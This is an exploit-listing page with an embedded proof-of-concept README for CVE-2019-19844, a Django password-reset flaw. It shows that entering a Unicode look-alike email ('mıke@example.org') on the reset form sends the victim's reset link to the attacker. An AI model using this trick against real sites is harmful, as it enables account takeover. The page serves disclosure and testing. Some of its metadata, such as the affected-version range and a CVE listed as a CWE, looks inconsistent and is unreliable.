django_cve_2019_19844_poc

vendor:

Django

by:

Exploit Database

9.8

CVSS

CRITICAL

Authentication Bypass

287

CWE

Product Name: Django

Affected Version From: Django version 3.0.0

Affected Version To: Django version 3.0.6

Patch Exists: YES

Related CWE: CVE-2019-19844

CPE: a:djangoproject:django:3.0.0

Metasploit: https://www.rapid7.com/db/vulnerabilities/debian-cve-2019-19844/, https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2019-19844/, https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2019-19844/, https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2019-19844/, https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2019-19844/

Other Scripts: N/A

Platforms Tested: None

2019

This PoC exploits a vulnerability in Django which allows an attacker to bypass authentication by using a specially crafted email address. The attacker can use this vulnerability to reset the password of any user in the system and gain access to their account.

Mitigation:

Upgrade to Django version 3.0.7 or later.

Source

Exploit-DB raw data:

EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47879.zip


# django_cve_2019_19844_poc
PoC for [CVE-2019-19844](https://www.djangoproject.com/weblog/2019/dec/18/security-releases/)

# Requirements

- Python 3.7.x
- PostgreSQL 9.5 or higher

## Setup

1. Create database(e.g. `django_cve_2019_19844_poc`)
1. Set the database name to the environment variable `DJANGO_DATABASE_NAME`(e.g. `export DJANGO_DATABASE_NAME=django_cve_2019_19844_poc`)
1. Run `pip install -r requirements.txt && ./manage.py migrate --noinput`
1. Create the following user with `shell` command:

```python
>>> from django.contrib.auth import get_user_model
>>> User = get_user_model()
>>> User.objects.create_user('mike123', 'mike@example.org', 'test123')
```

## Procedure For Reproducing

1. Run `./manage.py runserver`
1. Open `http://127.0.0.1:8000/accounts/password-reset/`
1. Input `mıke@example.org` (Attacker's email), and click send button
1. Receive email (Check console), and reset password
1. Login as `mike123` user